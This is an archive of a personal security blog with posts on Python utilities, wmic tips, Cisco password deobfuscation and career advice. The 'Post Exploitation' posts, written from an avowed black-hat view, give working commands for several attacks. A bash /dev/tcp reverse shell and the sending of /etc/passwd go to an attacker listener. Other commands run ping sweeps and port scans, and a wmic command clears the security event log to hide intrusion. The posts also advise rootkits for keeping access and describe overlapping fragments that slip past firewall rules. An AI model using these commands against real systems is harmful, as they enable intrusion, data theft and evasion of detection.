Information Security

python script to download files via google search

2012-01-14T09:32:00.000-08:00

Just now some one was asking to me on chat if there is some script which can download the files if given a google search query.

When thinking I suddenly remember that I had coded such a script some time ago using xgoogle libray of python. So I just searched for my script and here it is.

As you know I am lazy, I have used xgoogle and not directly handle google via httplib or urllib etc etc. My script used getopt library to parse the options given to the script. (again I am lazy)
(xgoogle library can be downloaded at http://www.catonmat.net/blog/python-library-for-google-search/)

The general syntax of this script is

python gsrchDwn.py --query "query_text" [--ftype file_extension] [--cnt contine_result_number] [--dir download_dir]

usage: python gsrchDwn.py --query maths made easy --ftype pdf

IMP Notes
1)It proper results are not got try the query in " (double quotes)
2) This file need xgoogle library found at http://www.catonmat.net/blog/python-library-for-google-search/

If --dir is not given it will download files into current directory.
If the script is stopped inbetween you can continue from the last result number by using --cnt result_number

This time I am have become a good boy and also added a status printing which shows how much percentage of current file is downlaoded.

grsrchDwn.py can be downloaded HERE

Let me know any comments.

Python script to check valid email addresses

2011-12-05T09:12:00.000-08:00

We were having discussion about checking a list of email addresses for validity.
one of member had posted a bash script for Linux to verify the email addresses before sending the emails.

I thought to write a python script for the same in windows. Well this script can be easily ported to linux with just one or two lines changed. But I was too tired after all day office work to write check for OS and write windows as well as linux code. Currently it is only for gmail domain. But can be easily ported to every domain. Just need to extract domain from email id and check its MX by the existing code. (I told you already I am tired to write more code)
If some people found this useful and need sophisticated version then I would release a next version of program.

This python code take one argument which is list of emails one per line in text format.

You can download python file HERE

Control PC through TV Remote Control

2011-12-01T08:28:00.000-08:00

Recently I attached a LCD screen to my PC to watch Movies.

While watching movies I came across the fact that I was only able to adjust Volume, Color, Contrast, etc. TV features only.

Whenever I had to play/pause the movie or control media player I had to go towards the PC keybord / mouse. I found it very irritating. Then I thought why not use the Teensy (I had got some days ago) to code something using Infra Red Receiver. So I went to my favorite electronics shop and inquired for Infra Red components. I got one IR LED and one IR Receiver (TSOP1738)
TSOP1738 Manual Here

IR Reciver Pinout:

Surprising to me this Receiver was very cheap (converted to US$ 0.40$), when I checked some circuit ideas online only this IR receiver + Teensy was needed in the circuit.

The Teensy Pinout for Arduino is as shown bellow

The circuit is so simple. Just connected GND to GND Pin of Teensy and Vs to +5v pin of Teensy.
Pardon me for such rough circuit diagram but , I didnt thought I should waste more time in circuit diagram of so simple circuit. If any one has some doubts drop me a comment and I would provide answer to queries.

Rough Circuit Diagram

After that there I used a sample program that comes with IR Library with little but modification to blink built in LED on the Teensy Bord. This Infrared dump program can be find HERE
Then I pressed buttons of Remote and Noted down the Code received by IR Circuit.

Then I wrote a new program that can control the Media Player Classic which I use to watch movies. I coded shortcut keys used by Media Player Classic in my program and executed them when received the particular code of the Remote Key.

Then I remember reading somewhere that Teensy can also move mouse. So I went ahead and mapped the Remote Directional keys to mouse. I used Mouse.move(x,y) function and mapped 4 movements of mouse to the four directional keys found on my Remote.

So the is TV remote used to control Media Player Classic and also Mouse Movement on PC.

My Code can downloaded HERE

Photo of my Circuit looks like bellow

Automate irritating ISP login

2011-09-20T01:15:00.000-07:00

Well recently my ISP updated their systems and made compulsory web login before giving access to any other site. I found this very frustrating and didnt liked it. Every time I start my modem I have to login to this ISP web login form.

So I just think to automate this process, I wrote a small python script to automate this login process. So as per my convenience I can put it in auto-run after login or whatever I want. Since I am lazy programmer I searched for a library which gave me easy manipulation of web forms. So I found mechanize module for python doing things which were necessary for this script. (Dont ask me why python , I dont want to start unother python Vs xyz Language fight. I like python very much so python :-) )

For easy usage of script I will briefly describe 5 parameters which are needed to be set one time before using this script.

loginURL = "http://login.example.com" # URL to Login form of ISP site

Here you have to put URL of the login page where the login form is shown

loginID = "myUserName" # ISP user name
loginPassword = "mYp4ssw0rd" # ISP Password

Quiet self explanatory : Username and password

loginFormName = "loginForm"

On the login page of the ISP site, check the html code for

successString = """NOW ACTIVATING YOUR SERVICES"""

Do a manual login and check the first page shown after login and copy any string from that page which is shown every time you login. This is used to check whether the login was successfull.

Comments are welcome.

Download script here

PythonScript ISPlogin.py

SL4A:The Scripting Layer for Android

2011-09-12T10:03:00.000-07:00

SL4A enables it to support many scripting language
interpreters. In order to make practical use of SL4A, we will need atleast
the rudiments of one high-level scripting language such as Python, Ruby, Perl, Lua,
JavaScript, or BeanShell.

For me it meant ability to create and run python scripts on my phone without having to ROOT the phone. It makes possible to use lots of GUI like Checkboxes, Radio buttons, Inputbox very easily. I checked out some sample scripts and they were small and simple scripts just like normal python.

For ex. only 4 lines code was able to speak time using text-to-speech engine. Mind it two lines of them were import statements :D

import android
import time

droid = android.Android()
droid.ttsSpeak(time.strftime("%_I %M %p on %A, %B %_e, %Y "))

I found out about python scripting on android after months of buying the android phone :D
I feel ashamed of myself for not finding out this long ago. Well there were some battery problems with phone so had to give it back to service center two times. But it feels great now.

Better than that it allows directly creating & editing the scripts directly on phone also :-D

So I would be starting some scripting on python. If done anything interesting I will post it.

What not to do...Job Seekers

2010-11-03T03:17:00.000-07:00

and offcourse some to do...

Well I have seen a large number of Resumes and also taken interivew of lots of candidates. I wanted to give some thoughts about to do / not to do about the resume, telephonic conversation, interviews. Others are welcome to add / discuss any points.

Resume

1) Keep your point wise

a. Don’t keep paragraphs of information regarding your skills or background.

b. Always keep information point wise.

2) Highlight the key skills for the job for which you are applying. If you looking jobs in multiple fields (Ex. Developer / Tester / Etc.) keep different resume ready for each field. Each field would have some different skills which you need to highlight.

3) Don’t put too much of information in resume. Also what ever tool / skill / project you have put in to your resume you should be able to answers any question regarding to that.

4) In my experience half of the interview questions would come from what you have written in the resume.

Telephonic Conversations

1) Be professional always ask the basic information like job profile , job location in the first place.

2) If the job profile and job location meets your need then only take forward the talks. Other wise you would be wasting your and other party’s time as well.

3) Always make a note of Name of the person with whom you had conversation for future reference

4) When you give time to any person for telephonic conversation, keep you mobile reachable, well charged. Its not good to give these reasons for not attending the call.

Face to Face Interview

1. Do dress decently in official dress.

i. Even if the office is using casual dresses

ii. Interview is not the place to show off with casuals

2. Carry a copy of resume with you and 2 photographs even if not asked by the company. You don’t know when they would come in handy

3. Do ask permission before going in to the interview room

4. Do not seat down before you are asked to do so

5. If interviewer offer shake-hand give a firm shake-hand.

6. Listen carefully to the question asked , if you don’t able to listen to a question politely ask to repeat the question

7. But don’t ask every time to repeat the question , some time its ok not every time.

8. Do answer with truth, if you don’t know any thing admit it that you don’t know it. No one is perfect.

9. Study the basics well before going for interview.

i. Ex. If you going for Developer interview you should know the basics of the programming language.

ii. If you going for Networking / Security profile your networking knowledge should be sound. (Ex TCPIP / ISO Layers etc). For a fresher at-least there is no excuse to Not have knowledge of TCPIP

Hide text in notepad

2010-03-30T06:43:00.000-07:00

Hi there,
After some busy weeks, I am back. I had discussion with my regarding hiding text in the txt file using the notepad. So I am giving here the way by using which any text can be hidden in the notepad and you can have your own password for the hidden text also.
If you already dont know this go forwarding reading...

In windows you can hide some text in the txt file using only notepad and no other tool.

The way to do is ...

use following command to create a text file..

go to any specific folder of your choice in cmd prompt,
type command

notepad secret.txt:thisismypassword

Notepad will ask "Do you want to create a new file?"
Click "Yes"

Now the title bar of notepad should read like
secret.txt:thisismypassword.txt - Notepad

Edit and enter any text in this notepad file.

Close this file.

Go to windows explorer and navigate to that specific folder you will see only one file
secret.txt.

If you open this file you will see blank. You can enter any garbage in this secret.txt also and save it. It will not change your secrte data which was entered earlier.

To reopen the secrete data type same command again

notepad secret.txt:thisismypassword

You will see your data again. When opening file like this you can edit it and change your secrete data.

P.S. Regards to Cybercrawler for his posts

NullCon Security & Hacking Conference

2010-01-10T21:32:00.000-08:00

NullCon

If you too share the passion for knowledge, if a core dump brings glimmer to your eyes, if you want to share your hack with others and you have an inquisitiveness to learn, then nullcon is the place for you. If meeting hackers/researchers/phreaks in a 2 days event packed conference and the sun-bathed beaches of the tropical paradise called Goa won’t get you off your bed, nothing ever will.

So crack you knuckles, fire your Live CDs, dust your Debuggers and get ready for some serious action this February.

STATUTORY WARNING: nullcon can cause severe exposure to high octane gyan and could leave participants exhausted with wild shack parties. Beware, Be There.

For registartion visit nullcon.net

See you there at NullCon !!!

Using Multiple Monitors - like seen in movies

2009-12-28T21:29:00.000-08:00

I had already discussed use of multiple monitors with Microsoft PowerPoint to make your presentations easier. When ever I am in my workplace I use extra monitor with my laptop. I just love using that.
First important thing linux inbuilt support multiple monitor with lots of features so I am not talking about linux os in this section, I am talking aobut Microsoft Windows.

Remember the computer setup in movie Swordfish ?

Dont you like that kinda of setup ??
Well I was also fascinated by that kinda of setup. I will discuss multiple techniques you can use to get that kind of setup. But money does matters so first I will describe about hardware options to get this kinda setup then I will describe software options.

1) If you have lots of money to invest on this setup then you can go for laptop docking station. Something as seen at http://www.digitaltigers.com/sidecar.asp

This kinda of hardware setup can provide you lots of flexibility in terms of how you can use your multiple monitor setup.

2) If you dont have that kinda money (which is always the case with lots of us) then you can go for some other options like using laptops vga out to connect secondary monitor. In this case you can drag drop your applications on the secondary monitor and distribute space taken by your applications.

If you haven't used multiple monitors read the article from Microsoft http://support.microsoft.com/kb/307873

When I started using multiple desktops this way then first thing I noticed was there was no taskbar on the second desktop. After you drag drop applications on second monitor then also the taskbar icons stay on first monitor only. So my taskbar was becoming crowded. So I was looking for a solution which will give me second monitor with taskbar also. I found some solutions like http://www.realtimesoft.com/ultramon/
which give can give multiple desktops with taskbar also. If you dont want to go for paid solution then there is Multimon http://www.mediachance.com/free/multimon.htm which is freeware and only place a taskbar on the second desktop. Which application you drop on second monitor it will take taskbar icon to the its taskbar on second monitor. freemon taskbar dont have lots of fancy options but it does the work.
You can directly download mmtaskbar from this location http://www.mediachance.com/free/mmtaskbar21.exe

3) But you might have noticed that I was only talking about the second monitor and not multiple monitors, but laptops only have one VGA output. So only one monitor can be attached to it. So what about multiple monitor setup ???
Well multiple monitor you will need monitors. Even if you have monitors how will you connect them without hardware. So you cant do anything without getting some costly hardware ??
Well low cost solution is there If you have some spare computer or laptops. There is software solution by using which you can extend your monitor on any machine in the network. Maxivista is the name of one of such products found at http://www.maxivista.com/.

I have tried maxivista with total 4 monitors at a time, and it was working fine. So here you go... Now you can have your own setup like movies.

version 2 of script to check cisco router with Default password

2009-06-05T23:39:00.000-07:00

With request from my one fren to make the script more user frendly
I have created version 2 of the script which can be downloaded from http://neo1981.googlepages.com/ciscoPassChkv2.py

Well Here is some Spoon Feeding and brief documentation as Requested by my fren.

This script is checked on windows xp with python version 2.5. Though it should run with python 2.3 and 2.4 also.

You can download python for windows or linux machine from this page http://python.org/download/

On Linux system you can execute the script by using commnd
# python ciscoPassChkv2.py

On windows you can execute script by using command

C:\>c:\Python25\python.exe ciscoPassChkv2.py

Where C:\Python25\ is the directory where you have installed python 2.5

By default the script will ask you IP address of the router to be checked for default login.
If you want multiple routers checked at one go, put the IP addresses of the routers one IP in single line in a file and save
it as iplist.txt
Keep iplist.txt in the same folder as the python script and run python script. The script will read IP addresses from the file and check
those routers for default passwords.

python script to find cisco routers with default password

2009-05-22T23:45:00.000-07:00

While I was doing my work (No options...have to do some to earn) in recent days
I was busy auding lots of cisco routers. As hacker mind I just went ahead hacking my way in to nearly all routers getting full access. But when I had completed my work I suddenly remember that some of the routers used default passwords and others I had extracted password from config of already accessed routers. But I just didnt remember for which routers I found using default password. As usual the programmer in me wake up (My colleague said he would check out manualy in 1 hour) I said I would better use half hour to write a script to find out those. This script will be use full in finding out routers with default password in future also.
So I did write a python script (you must be knowing by now python is my fav language) to check out routers with default passwords.
This script is still in its early stages. So looking forward for some good or bad feedbacks.

You can find script at
http://neo1981.googlepages.com/ciscoPassChk.py

Decrypting...No..Deobfuscating Cisco IOS Passwords

2009-05-22T23:23:00.000-07:00

Why I said not decrypt but Deobfuscating ???

The level 7 password is not actually encrypted . The Vigenere algorithm is used to obfuscate the passwords (there is not key used in this algo)

Cisco IOS uses this level-7 encryption when the "service password-encryption" command is used.

I found some interesting info while I was getting tools to decrypt cisco level 7 password. Yes you might know that there are Lots of softwares available on net whcih decrypt cisco 7 secrete. But this method got my attention since it uses cisco commands to obtain cleartext password from the secret.

Here it goes...
The show key-chain command executed on Cisco IOS displays the password configured in a key chain in cleartext even when the same password is stored as type-7 obfuscated password in the router configuration.

For example, if you want to get the cleartext password corresponding to string 04480E051A33490E, enter the following lines into the router configuration (any routers configuration it can be your router not necessary victims router :D) :-

R1(config)#key chain test
R1(config-keychain)#key 1
R1(config-keychain-key)#key-string 7 04480E051A33490E

When you execute show key chain test command, the cleartext value of the password is displayed:

R1#show key chain test
Key-chain decrypt:
key 1 -- text "secure"
accept lifetime (always valid) - (always valid) [valid now]
send lifetime (always valid) - (always valid) [valid now]

Walla Cleartext without using any tools

I also have found perl code by Bostjan Sustar to do the same task.
The perl code is uploaded at http://neo1981.googlepages.com/decrypt_cisco.pl

Story of IT Novice

2009-03-18T23:05:00.000-07:00

I read a very good story on my frens profile... I thought I should share with all

IT Novice and Master...

One day a Novice came to the Master.
"Master," he said, "How is it that I may become a Writer of Programs?".
The Master looked solemnly at the Novice.
"Have you in your possession a Compiler of Source Code?" the Master asked.
"No," replied the Novice. The Master sent the Novice on a quest to the Store of Software.
Many hours later the Novice returned.
"Master," he said, "How is it that I may become a Writer of Programs?".
The Master looked solemnly at the Novice.
"Have you in your possession a Compiler of Source Code?" the Master asked.
"Yes," replied the Novice.
The Master frowned at the Novice.
"You have a Compiler of Source. What now can prevent you from becoming a Writer of Programs?".
The Novice fidgeted nervously and presented his Compiler of Source to the Master.
"How is this used?" asked the Novice.
"Have you in your possession a Manual of Operation?" the Master asked.
"No," replied the Novice.
The Master instructed the Novice as to where he could find the Manual of Operation.
Many days later the Novice returned.
"Master," he said, "How is it that I may become a Writer of Programs?".
The Master looked solemnly at the Novice.
"Have you in your possession a Compiler of Source Code?" the Master asked.
"Yes," replied the Novice.
"Have you in your possession a Manual of Operation?" the Master asked.
"Yes," replied the Novice.
The Master frowned at the Novice.
"You have a Compiler of Source, and a Manual of Operation. What now can prevent you from becoming a Writer of Programs?".
At this the Novice fidgeted nervously and presented his Manual of Operations to the Master.
"How is this used?" asked the Novice.
The Master closed his eyes, and heaved a great sigh.
The Master sent the Novice on a quest to the School of Elementary.
Many years later the Novice returned.
"Master," he said, "How is it that I may become a Writer of Programs?".
The Master looked solemnly at the Novice.
"Have you in your possession a Compiler of Source Code, a Manual of Operation and an Education of Elementary?" the Master asked.
"Yes," replied the Novice.
The Master frowned at the Novice.
"What then can prevent you from becoming a Writer of Programs?".
The Novice fidgeted nervously. He looked around but could find nothing to present to the Master.
The Master smiled at the Novice.
"I see what problem plagues you." said the Master.
"Oh great master, please tell me." asked the Novice.
The Master turned the Novice toward the door, and with a supportive hand on his shoulder said, "Go young Novice, and Read The Fucking Manual." And so the Novice became enlightened.

Windows Commandline KungFu Part 2

2009-03-17T04:49:00.000-07:00

If you check out wmic has many good feature that we never use. Since I like commandline very much I am always upto commands and keybord shortcuts. :D

Now some more info about wmic...
If you use command

C:\> wmic /?
Then you would get a list of attributes and all the settings for given alias.

For example type

C:\>wmic share list full

AccessMask=
AllowMaximum=TRUE
Description=Remote IPC
InstallDate=
MaximumAllowed=
Name=IPC$
Path=
Status=OK
Type=-2147483645
...
...

Good ? not enough but there is more wmic is object oriented , so you've got attributes and methods. Attributes are cool, letting you get info about your box and tweak it a bit, but methods let you take action on a box, giving you real power.

For example

C:\> wmic process where name="cmd.exe" call getowner

Or, even:

C:\> wmic process where name="cmd.exe" call getownersid

Nice ! isnt it ?

Second Example : We want a built in command to reboot or shutdown windows box accross the network. Try this

C:\> wmic os where buildnumber="2600" call reboot

Third example get parameter (Atrribute of object)

C:\>wmic nic get macaddress,name

You want interface-related methods? Check these out:

C:\> wmic nicconfig call setdefaultttl 200
C:\> wmic nicconfig call settcpwindowsize 3212

Those change the IP TTL and TCP Window size from default settings to something else, possibly fooling some forms of passive OS fingerprinting. Be careful with them, though... changing those settings could hose your network performance, make your system ugly, and make your hair fall out. You have been warned!

Now how about some nasty example :D
Like from POST Exploitation ;)

you could:

C:\> wmic nteventlog where (description like "%secevent%") call cleareventlog

Guess what it would do ????

or events like those associated with logging onto the box:

C:\> wmic ntevent where (message like "%logon%") list brief

Fifth, here is one that could be useful for handlers:

C:\>wmic netlogin where (name like "%neo%") get numberoflogons
NumberOfLogons
1760

Where neo is username offcourse.

you can use methods associated with "wmic service" to change the service configuration, as in:

C:\> wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled

//Spot odd executables
C:\> wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath

//Look at services that are set to start automatically
C:\> wmic SERVICE WHERE StartMode="Auto" GET Name, State

//Find user-created shares (usually not hidden)
C:\> wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path

//Find stuff that starts on boot
C:\> wmic STARTUP GET Caption, Command, User

//Identify any local system accounts that are enabled (guest, etc.)
C:\> wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name"

Enjoyyyyy....

Windows Commandline KungFu Part 1

2009-03-15T22:50:00.000-07:00

When I first attended training by ed on commandline kungFu I was just amzed.

Well bassically commandline KungFu is more about windows commandline since linux already has extremly powerfull commandline so need to go to that side.

Lots of people dont know or ignore the power of wmic commands, we will start with wmic command which will allow us some stuff that we always do on linux.

C:\> wmic process [pid] delete

That's the rough equivalent (for you UNIX/Linux minded folks) of "kill -9 [pid]".

Or, better yet, try this one on for size:

C:\> wmic process where name='cmd.exe' delete

I love that one! It functions something like "killall -9 cmd.exe" would on a Linux box, where killall lets you kill processes by name.

And, check this out:

C:\> wmic process list brief /every:1

Sort of like (but not exactly) the Linux/UNIX top command.

But, wait! There's more...

C:\> wmic useraccount

This one gives a lot more detail than the old "net user" command. With "wmic useraccount" you get user names, SIDs, and various security settings.

Fun, fun, fun! Here's another:

C:\> wmic qfe

This one shows all hotfixes and service packs. qfe doesn't stand for Quad Fast Ethernet... It stands for Quick Fix Engineering in this context.

C:\> wmic startup list full

It shows a whole bunch of stuff useful in malware analysis, including all files loaded at Startup and the reg keys associated with autostart.

C:\> wmic process list brief | find "cmd.exe"

That works a little like a Linux "ps -aux | grep cmd.exe".

So, I run it as I show above, piping its output through sort, find, findstr, etc.

C:\> wmic /output:[file] [stuff you want it to do] /format:[format]

Numerous formats are supported, including HTML format (hform), CSV, XSL, and so on. So, check this out:

C:\> wmic /output:c:\os.html os get /format:hform

Then, open c:\os.html in a browser, and soak in that beautiful output. Ooooohhhh. Ahhhhhhh.

For a list of format types supported by WMIC, you could type:

C:\> wmic [stuff to do] /format /?

As in:

C:\> wmic process list /format /?

Going further, there is ability to pull lists of attributes and output them nicely, as follows:

C:\> wmic /output:c:\temp.html os get name,version /format:htable.xsl

Post Exploitation 2

2009-01-29T03:18:00.000-08:00

We had discussion going on the topic Post exploitation when I realized that in my first post I didnt put any special things on windows. So I am adding that information in this second post on this topic.

Like lots of people dont know that there are FOR loop on windows command line using which we can have a ping sweep or port scan from cmd without any thirdparty tools.

Ex.

Ping Sweep: Using following command we can run a ping sweep
FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

This command will run a ping sweep on 10.10.10.0/24

Command line port scanner using ftp client:
The windows ftp client can be used as a port scanner.
But
C:\> ftp [IP_address]
This is not allowing to put port number and defaults to port 21 for connection.
But... we can specify a destination port in a ftp command file
- open [IP_addr] [port]

FTP client then can read this ftp commands file and execute them.

C:\> ftp -s:[filename]

So using this and FOR loop together...

for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Now the ports.txt will have output of the port scanner.

One more option in the FOR command let us use file as input

Ex. There is file with name PTips.txt containing one IP address each line
so following command will iterate through the file.

FOR /F "delims=^" %i in (PTips.txt) do ping %i

C:\>ping 222.222.222.222
Pinging 222.222.222.222 with 32 bytes of data:
Reply from 222.222.222.222: Destination net unreachable.
...
...

One more addition
Having only cmd in windows does put lot of restrictions.
Lots of time I miss the simple commands like in linux to get HTML pages.
Can we download HTML pages on windows without Browser ???
...
...
...
Yes We Can
The problem with telnet is it dont allows us to redirect the output or screen to some file...
So... so we use -f for creating log of the telnet session.
Ex. Windows telnet as simple HTTP GET tool
C:\> telnet -f log.txt
Welcome to Microsoft Telnet Client
Escape Character is 'CTRL+]'
Microsoft Telnet>o in.yahoo.com 80
...
...
Microsoft Telnet>sen GET / HTTP/1.0
...
Html contents will scroll down all of sudden but dont worry,
all that content will be saved to the log file: log.txt
There you go.

Post Exploitation...

2009-01-27T03:04:00.000-08:00

One of my fren asked that "scenario is that you have gotta interactive shell on remote machine (linux/windows) with admin privileges (not semi interactive like c99, r57 etc. i.e. suppose you have got the command prompt / console)"

Now what do you think you would be doing as "POST EXPLOITATION" to have complete control over the server.

As per his request my answer is from black hat perspective...

After getting access to any victim machine most important thing is to maintain access. And a hacker should do all things necessary to maintain access.

I had herd comment from some one that he would install some service like VNC. Ofcourse this is lame answer according to me. But it draws attention to a basic point should we install some different backdoor ? I would rather suggest use of the existing service as backdoor instead of creating a new one. Becuase at this point we have to consider the fact that normally there would be some firewall in between attacker and the victim. So creating a new backdoor might not be usefull if the firewall is not allowing that service to accept connections. Anyways installing new backdoor means more files transfered to the victim, therefore more chances of getting detected.

If one want to use the backdoor then it should be used with addition of root kit ofcourse.
E.g.
Windows Rootkit ex. AFX Windows Rootkit: This rootkit will hide processes, files, folders
registry keys and netstat entries from Windows 95/98/ME/NT/2k/XP/2003

Linux Rootkits: No particular examaple I am giving, there are lots of which hide processes,files etc.

Using Inbuild linux Tools instead of external backdoors
For linux I would rather use the inbuild tools in linux to do things for me.
Most importatnt reason for this is "No external tool mean nothing for detect for antivirus" B-)

On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
Ex.
Victim>echo "Hello WOrld" > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
Hello WOrld

Not Imressed then look at this

Victim>cat /etc/passwd > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
root:x:0:0:root:/root:bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...
...

Transfer file without using even nc

Ok file transfer could be done What else do I want to do on my rooted box ?
have Backdoor shell,Scan for other Machines can we do that without external tools ???
...
...
Of course we can
...
How ??
Linux /dev/tcp .... is the key

Victim$>/bin/bash -i > /dev/tcp/10.10.10.66/2345 0<&1 2>&1

Attacker>nc -l -p 2345
victim@linux:~$whoami
user12

Now Port scanning...
you guessed correct /dev/tcp :D

$ echo > /dev/tcp/10.10.10.66/25
bash: connect: Connection Refused
bash: /dev/tcp/10.10.10.66/25: Connection refused

$ echo > /dev/tcp/10.10.10.66/80
$ #Command successful means port 80 is listening

This is just some example you can go ahead with you own tricks... So this concludes some of the things ( only some of things.. ;) ) I would do Post Exploitation

Sinowal trojan: Three years old and just plain nasty

2009-01-13T00:07:00.000-08:00

Sinowal is a dangerous piece of malware. Security analysts are just beginning to realize how much so. That’s because the Sinowal trojan is unique in its attack vector, and we need to understand what’s different about it.

“We recently discovered that, dating back as early as February 2006, the Sinowal Trojan has compromised and stolen login credentials from approximately 300,000 online bank accounts as well as a similar number of credit and debit cards. Other information such as email, and FTP accounts from numerous websites, have also been compromised and stolen.”
- RSA FraudAction Research Lab

“How can Mebroot/Sinowal do their dirty work without a malicious component? Well, because Sinowal controls the boot sequence, it can inject the malicious code into legitimate Windows Components. It will hook key functions that the Internet Explorer will use to do its day-to-day job like sending and receiving encrypted data. Yes, you are right. Mebroot/Sinowal does have full control over the encrypted data stream as it has access to it before it will be encrypted and after it has been decrypted.”
- TrustDefender Labs

Read the whole article by Michael Kassner HERE

Showing Only Presentation on External Display

2008-09-05T00:28:00.000-07:00

Doing presentation is not liked by most of the techies, But there are times in life where you have to do presentations. When I started giving presentations from lots of days I was thinking is there any way I can see my notes on my laptop and my audience will only see the presentation. Because it is very frustrating if you forgot any point and need to see the notes, all the audience will see those notes. I didnt like that. At last today I have found a way by which I can to that. Lots of you might be already knowing this. But I thought I would share this in case some of you dont know it.

Steps

Step 1: Right click on desktop select properties, select settings

Step 2: Check if Multiple Monitors option is available if not you need to check your graphics drivers.

Step 3. Right click on second monitor, click on attached

Step 4: Go to power point click on Slide Show -> Setup slide show

step 5: In the multiple monitors section select Monitor 2

Step 6: Press F5 to start slide show ..... Valllaaa only your slide show is shown on your external monitor / projector.

You can see your notes , do any thing on you laptop that will not be shown in the external monitor.

Hacker and Security Consultant

2008-07-28T05:01:00.000-07:00

Some days ago when I was viewing a video from the shmoocon 2008, Hackajar told a very interesting difference between a hacker and security professional, he said

"Under the Age of 25 you are a hacker you are over the age of 25 you are a security professional"

So I was thinking about this statement like and I was like "Waw" how true !! Like when we are in our young age we dont have responsibilities on us. Most probably parents are paying for our education and for our living. At those time we can go on and on doing hacking stuff but we dont get any pay for that. They say White Hat, black hat are there black hat dont like white hats but there is one important statement made by simple nomad in this talk that was

"The basic different between Black hat and white hat hacker is that White hat has Mortgage."

So when you get little older responsibilities come, you need to earn for living. At that time one will think and I like to hack things, if I get a money to hack things then why I shouldn't take this opportunity ? Yes there are some restrictions on the you when you become white hat but every thing has its plus and minus. So its so true that as hackers become old they might go to the security scene. So whats bad in that ?

Packet Freagmentation Attack against Firewalls

2008-07-07T05:25:00.000-07:00

For those who dont know what is packet fragmentation: you dont belong here, Dont read this article.

Legal Bullshit
DISCLAIMER
This artical is provided for general informational purposes only, without warranty, either expressed or implied. How you use this information is upto you and author is not liable for that.
(F*ing B@$# S**t)

As we know due to differnet MTU (Maximum Transmission Unit) size in the different networks the TCP/IP packets need to be fragmented some times.
If you are RFC junky then RFC 791 - Internet Protocol is reffernce for you.

3 fields are involved in the fragmentation Identification,Flags,Fragment Offset

1. Identification: 16 bits

An identifying value assigned by the sender to aid in assembling the fragments of a datagram.

2. Flags: 3 bits

Various Control Flags.


Bit 0: reserved, must be zero 
Bit 1: (DF) 0 = May Fragment, 1 = Don't Fragment. 
Bit 2: (MF) 0 = Last Fragment, 1 = More Fragments. 
  0   1   2
+---+---+---+
|   | D | M |
| 0 | F | F |
+---+---+---+

3. Fragment Offset: 13 bits

This field indicates where in the datagram this fragment belongs.

The fragment offset is measured in units of 8 octets (64 bits). The first fragment has offset zero.

Bellow is the idea of how packet fragmentation can be used to get around rules in some firewalls. To do this the main idea is to set the offset of the second packet is so low that the second packet will actually overlap on the first packet and the data of the first packet will be overwritten.

For Example.
Suppose there is a firewall rule that only allows port 80 to be connected from internet to inside server and say you want to do a ssh (port 22) connectoin to that server.
Then the first packet would be sent to the server with the port number 80 and
with the DF bit = 0 (May Fragment) and the MF bit = 1 (More Fragments). Since the firewall is configured to allow the port 80 connection it will allow this packet.

The second packet should be sent with the DF bit=0 and MF bit =0 (Last Fragment), port will be 22 and the Fragment Offset is given as 1. This will over write the first packet except the first 1byte(8bits) of the packet.

This second packet will be accepted by the firewall since it is part of the first packet and first packet has been already accepted by the firewall. So final assembled packet will have port 22. This packet will be forwarded to the server's port 22 this way.

Instant Hacking / Security

2008-04-08T10:24:00.000-07:00

If one see the graph of the computer attackers knowledge from 80s to today then there will be a big big drop down in attackers knowledge. I have seen some people who want knowledge with less or no effort. Worst case others don't want knowledge. Thats why there are lot and lots of Script kiddies these days.
There are lots of cases where a Microsoft Windows Exploit are being used on a linux/unix server by these script kiddies. I dont know why know one is ready to search a little bit , read a little bit. I think all are locked in to the instant phase created by media (instnat noodles, instant food, instant banking) So they want instant hacking also. But how do we say to them that hacking is not a instant packet. That just keep in oven / microwave and ready to serve. Even the people in the information security are exception for this. Lots of people in Information Security area also want to download Nessus, click on All the Plugins and hit on the target. They dont want to take some time to understand the tool, understand its working. Hell they dont even want to learn about the target against which they are using these tools. I think now is the time to follow the old school techiniques. It is very important if devlopement of the information security personal is concerned. I dont get how come person in the security also dont want to learn things about the network and tools that they use. I think lots of person are security area also only interested in showing some dumb nessus report to the user and get work done. What they dont understand is this is going to harm them in the future than the Client to which they are giving these reports. Their personal growth will affect from this kind of working. So atleast for personal interest try to learn / get information.

Nmap 10th Anniversary Edition (4.50) released

2007-12-18T06:39:00.000-08:00

After Two Years a major version change in nmap is here.
The new nmap anniversary edition is available for download.
Here is what the mail from fyodor says

------------------------------------------------------------------------------------------------
FROM Fyodor

Hi everyone. I'm proud to say that Nmap has reached its 10th
anniversary since I released it in 1997, and it is still going strong!
To celebrate that, Nmap 4.50 has been released. It is the first
stable release in more than a year (there have been dozens of dev
releases), and the first major release since 4.00 two years ago.

In related good news, the movie Bourne Ultimatum was released to DVD
on Tuesday, and is currently the 3rd highest selling DVD on Amazon.
In this movie, the CIA needs to hack the mail server of a newspaper
(The Guardian UK) to read the email of a reporter they
assassinated. So they turn to Nmap and its new official GUI Zenmap
(part of the 4.50 release)! I have screenshots up on
http://insecure.org . Nmap has now appeared in at least five
movies--it has become quite the movie star!

The changelog shows 320 changes since 4.00 with a lot of great stuff
in this release! It has a brand new GUI and results viewer (Zenmap),
a scripting engine allowing you to write your own scripts for
high-performance network discovery (or use one of the 40 scripts
shipped with it), the 2nd generation OS detection system (now with
more than a thousand fingerprints), nearly 1,500 more version
detection signatures, and a lot more! You can read the full release
announcement, which describes the changes as well as future plans,
right here:

http://insecure.org/stf/Nmap-4.50-Release.html

Or if you are ready to jump right in, head to the download page:

http://insecure.org/nmap/download.html

We don't have an ad budget, so please help spread the word about the
new Nmap. The 4.00 release made Slashdot, Digg, etc. and this release
is even better!

And of course be sure to try it out yourself! Let us know on the
nmap-dev list if you encounter any problems. See
http://insecure.org/nmap/man/man-bugs.html .

Cheers,
Fyodor

------------------------------------------------------------------------------------------------
!!!!! Cheeeeeeeerssss to Fyodor !!!!!

An almost invisible ssh connection

